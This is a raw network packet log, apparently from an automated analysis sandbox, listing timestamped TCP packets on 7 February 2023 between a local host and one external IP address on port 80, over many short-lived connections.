Feb 7, 2023 20:02:06.483366966 CET	49991	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:06.484304905 CET	49992	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:06.544418097 CET	80	49991	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:06.544656038 CET	49991	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:06.548005104 CET	80	49992	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:06.548270941 CET	49992	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:06.575938940 CET	49992	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:06.638767958 CET	80	49992	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:06.642028093 CET	80	49992	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:06.642246962 CET	49992	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:06.905981064 CET	49992	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:06.970726967 CET	80	49992	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:06.970949888 CET	49992	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:06.974275112 CET	49993	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:07.034881115 CET	80	49993	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:07.035103083 CET	49993	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:07.121548891 CET	49993	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:07.182153940 CET	80	49993	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:07.187078953 CET	80	49993	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:07.187280893 CET	49993	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:09.015722990 CET	49993	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:09.016853094 CET	49994	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:09.076206923 CET	80	49993	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:09.076442003 CET	49993	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:09.077694893 CET	80	49994	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:09.077873945 CET	49994	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:09.136023998 CET	49994	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:09.196660042 CET	80	49994	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:09.200330019 CET	80	49994	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:09.200546980 CET	49994	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:09.592603922 CET	49994	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:09.594010115 CET	49995	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:09.653371096 CET	80	49994	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:09.653592110 CET	49994	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:09.656457901 CET	80	49995	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:09.656666040 CET	49995	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:09.662326097 CET	49995	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:09.725275993 CET	80	49995	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:09.728123903 CET	80	49995	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:09.728337049 CET	49995	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:09.847222090 CET	49995	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:09.848057985 CET	49996	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:09.908611059 CET	80	49996	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:09.908822060 CET	49996	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:09.909681082 CET	80	49995	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:09.909792900 CET	49995	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:09.912451982 CET	49996	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:09.973149061 CET	80	49996	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:09.978259087 CET	80	49996	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:09.978410959 CET	49996	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:10.106373072 CET	49996	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:10.107345104 CET	49997	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:10.166929960 CET	80	49996	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:10.167121887 CET	49996	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:10.168606997 CET	80	49997	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:10.168793917 CET	49997	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:10.169392109 CET	49997	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:10.230643034 CET	80	49997	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:10.236095905 CET	80	49997	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:10.236311913 CET	49997	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:10.345364094 CET	49997	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:10.348507881 CET	49998	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:10.406939983 CET	80	49997	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:10.407170057 CET	49997	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:10.409060955 CET	80	49998	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:10.409261942 CET	49998	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:10.416841030 CET	49998	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:10.477741957 CET	80	49998	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:10.481199980 CET	80	49998	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:10.481367111 CET	49998	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:10.597229004 CET	49998	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:10.598385096 CET	49999	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:10.657828093 CET	80	49998	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:10.657949924 CET	49998	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:10.658759117 CET	80	49999	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:10.658912897 CET	49999	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:10.659482956 CET	49999	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:10.719894886 CET	80	49999	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:10.723718882 CET	80	49999	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:10.723948956 CET	49999	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:10.829675913 CET	49999	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:10.830796957 CET	50000	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:10.890386105 CET	80	49999	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:10.890583992 CET	49999	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:10.892244101 CET	80	50000	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:10.892432928 CET	50000	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:10.893167019 CET	50000	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:10.954499960 CET	80	50000	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:10.958776951 CET	80	50000	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:10.958971024 CET	50000	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:11.077080965 CET	50000	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:11.091622114 CET	50001	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:11.138776064 CET	80	50000	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:11.138942003 CET	50000	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:11.153242111 CET	80	50001	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:11.153403997 CET	50001	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:11.159822941 CET	50001	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:11.221426964 CET	80	50001	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:11.227298975 CET	80	50001	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:11.227567911 CET	50001	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:11.344810009 CET	50001	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:11.345769882 CET	50002	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:11.405606031 CET	80	50002	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:11.405982018 CET	50002	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:11.406250954 CET	80	50001	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:11.406351089 CET	50001	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:11.408989906 CET	50002	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:11.468689919 CET	80	50002	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:11.471474886 CET	80	50002	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:11.471662045 CET	50002	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:11.582572937 CET	50002	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:11.583328009 CET	50003	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:11.642307043 CET	80	50002	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:11.642465115 CET	50002	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:11.644890070 CET	80	50003	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:11.645056009 CET	50003	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:11.648731947 CET	50003	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:11.710114956 CET	80	50003	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:11.713573933 CET	80	50003	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:11.713639975 CET	50003	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:11.829682112 CET	50003	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:11.830795050 CET	50004	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:11.891268015 CET	80	50003	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:11.891443968 CET	50003	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:11.893125057 CET	80	50004	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:11.893275976 CET	50004	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:11.893867016 CET	50004	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:11.956197023 CET	80	50004	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:11.959650040 CET	80	50004	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:11.959785938 CET	50004	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:12.084789991 CET	50004	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:12.085776091 CET	50005	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:12.147455931 CET	80	50004	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:12.147572041 CET	50004	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:12.148303032 CET	80	50005	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:12.148458958 CET	50005	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:12.152879953 CET	50005	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:12.215421915 CET	80	50005	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:12.220577955 CET	80	50005	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:12.220755100 CET	50005	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:12.336905003 CET	50005	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:12.337918997 CET	50006	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:12.399091959 CET	80	50006	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:12.399363995 CET	50006	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:12.399403095 CET	80	50005	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:12.399507046 CET	50005	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:12.401268005 CET	50006	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:12.462580919 CET	80	50006	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:12.465497971 CET	80	50006	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:12.465626955 CET	50006	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:12.589353085 CET	50006	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:12.600514889 CET	50007	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:12.651556015 CET	80	50006	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:12.651789904 CET	50006	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:12.661144972 CET	80	50007	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:12.661467075 CET	50007	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:12.669390917 CET	50007	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:12.729886055 CET	80	50007	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:12.732749939 CET	80	50007	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:12.732898951 CET	50007	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:12.855262995 CET	50007	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:12.856131077 CET	50008	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:12.915704966 CET	80	50007	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:12.915883064 CET	50007	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:12.916553020 CET	80	50008	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:12.916706085 CET	50008	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:12.917279959 CET	50008	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:12.977670908 CET	80	50008	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:12.980612993 CET	80	50008	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:12.980762959 CET	50008	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:13.096560001 CET	50008	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:13.097585917 CET	50009	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:13.157126904 CET	80	50008	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:13.159883022 CET	80	50009	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:13.160008907 CET	50008	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:13.160074949 CET	50009	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:13.165565968 CET	50009	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:13.227823973 CET	80	50009	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:13.231556892 CET	80	50009	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:13.232713938 CET	50009	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:13.345664978 CET	50009	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:13.347245932 CET	50010	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:13.409694910 CET	80	50009	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:13.409787893 CET	80	50010	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:13.409915924 CET	50009	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:13.409996033 CET	50010	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:13.422324896 CET	50010	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:13.483872890 CET	80	50010	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:13.486661911 CET	80	50010	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:13.487055063 CET	50010	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:13.596334934 CET	50010	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:13.597347021 CET	50011	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:13.657903910 CET	80	50010	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:13.658142090 CET	50010	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:13.659773111 CET	80	50011	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:13.659991026 CET	50011	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:13.661822081 CET	50011	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:13.724386930 CET	80	50011	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:13.727159977 CET	80	50011	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:13.730601072 CET	50011	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:13.877016068 CET	50011	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:13.878074884 CET	50012	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:13.940762997 CET	80	50011	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:13.940969944 CET	50011	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:13.941708088 CET	80	50012	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:13.941870928 CET	50012	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:13.968224049 CET	50012	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:14.030725956 CET	80	50012	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:14.033350945 CET	80	50012	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:14.033581972 CET	50012	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:14.141998053 CET	50012	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:14.143326044 CET	50013	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:14.204557896 CET	80	50012	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:14.204642057 CET	80	50013	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:14.204708099 CET	50012	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:14.204792976 CET	50013	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:14.205368042 CET	50013	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:14.266896963 CET	80	50013	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:14.271131992 CET	80	50013	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:14.271266937 CET	50013	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:14.376477003 CET	50013	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:14.378318071 CET	50014	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:14.438118935 CET	80	50013	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:14.438220024 CET	50013	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:14.438738108 CET	80	50014	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:14.438874960 CET	50014	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:14.441730022 CET	50014	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:14.502202034 CET	80	50014	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:14.504437923 CET	80	50014	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:14.504518032 CET	50014	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:14.611212969 CET	50014	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:14.612308979 CET	50015	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:14.671813965 CET	80	50014	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:14.672025919 CET	50014	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:14.675795078 CET	80	50015	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:14.676064014 CET	50015	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:14.676485062 CET	50015	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:14.740422964 CET	80	50015	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:14.743518114 CET	80	50015	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:14.743623018 CET	50015	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:14.863344908 CET	50015	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:14.883249044 CET	50016	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:14.925957918 CET	80	50015	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:14.926193953 CET	50015	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:14.944977999 CET	80	50016	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:14.945251942 CET	50016	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:14.953403950 CET	50016	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:15.015166044 CET	80	50016	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:15.018220901 CET	80	50016	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:15.018441916 CET	50016	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:15.126646042 CET	50016	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:15.127789974 CET	50017	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:15.188549042 CET	80	50016	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:15.188774109 CET	50016	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:15.190042973 CET	80	50017	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:15.190294027 CET	50017	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:15.190910101 CET	50017	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:15.255089998 CET	80	50017	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:15.258924961 CET	80	50017	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:15.259375095 CET	50017	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:15.388442993 CET	50017	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:15.389533043 CET	50018	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:15.451380968 CET	80	50017	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:15.451572895 CET	50017	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:15.451700926 CET	80	50018	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:15.451838970 CET	50018	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:15.452445030 CET	50018	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:15.514802933 CET	80	50018	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:15.518418074 CET	80	50018	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:15.518616915 CET	50018	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:15.626322985 CET	50018	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:15.627332926 CET	50019	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:15.688186884 CET	80	50018	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:15.688347101 CET	50018	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:15.688642979 CET	80	50019	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:15.688774109 CET	50019	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:15.689584017 CET	50019	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:15.750861883 CET	80	50019	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:15.753391027 CET	80	50019	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:15.753555059 CET	50019	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:15.860732079 CET	50019	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:15.861867905 CET	50020	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:15.922209978 CET	80	50019	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:15.922394991 CET	50019	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:15.922966003 CET	80	50020	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:15.923122883 CET	50020	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:15.924236059 CET	50020	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:15.985414982 CET	80	50020	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:15.988842010 CET	80	50020	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:15.989061117 CET	50020	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:16.094635010 CET	50020	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:16.095652103 CET	50021	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:16.156017065 CET	80	50020	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:16.156249046 CET	50020	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:16.156975985 CET	80	50021	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:16.157133102 CET	50021	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:16.175025940 CET	50021	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:16.236737967 CET	80	50021	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:16.240391970 CET	80	50021	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:16.240502119 CET	50021	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:16.368966103 CET	50021	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:16.380697966 CET	50022	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:16.430825949 CET	80	50021	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:16.430939913 CET	50021	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:16.441056967 CET	80	50022	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:16.441181898 CET	50022	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:16.443010092 CET	50022	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:16.503371954 CET	80	50022	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:16.506484032 CET	80	50022	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:16.506597996 CET	50022	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:16.615786076 CET	50022	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:16.616754055 CET	50023	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:16.676146984 CET	80	50022	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:16.676318884 CET	50022	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:16.678339958 CET	80	50023	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:16.678488970 CET	50023	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:16.679938078 CET	50023	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:16.741508961 CET	80	50023	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:16.744438887 CET	80	50023	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:16.744544983 CET	50023	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:16.862083912 CET	50023	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:16.862945080 CET	50024	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:16.922454119 CET	80	50024	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:16.922558069 CET	50024	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:16.923135042 CET	50024	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:16.923547983 CET	80	50023	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:16.923624992 CET	50023	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:16.982533932 CET	80	50024	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:16.985208035 CET	80	50024	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:16.985352993 CET	50024	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:17.099250078 CET	50024	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:17.102034092 CET	50025	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:17.158674955 CET	80	50024	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:17.158830881 CET	50024	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:17.163294077 CET	80	50025	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:17.163494110 CET	50025	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:17.165507078 CET	50025	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:17.226999044 CET	80	50025	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:17.231359959 CET	80	50025	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:17.231462955 CET	50025	80	192.168.2.6	62.204.41.4
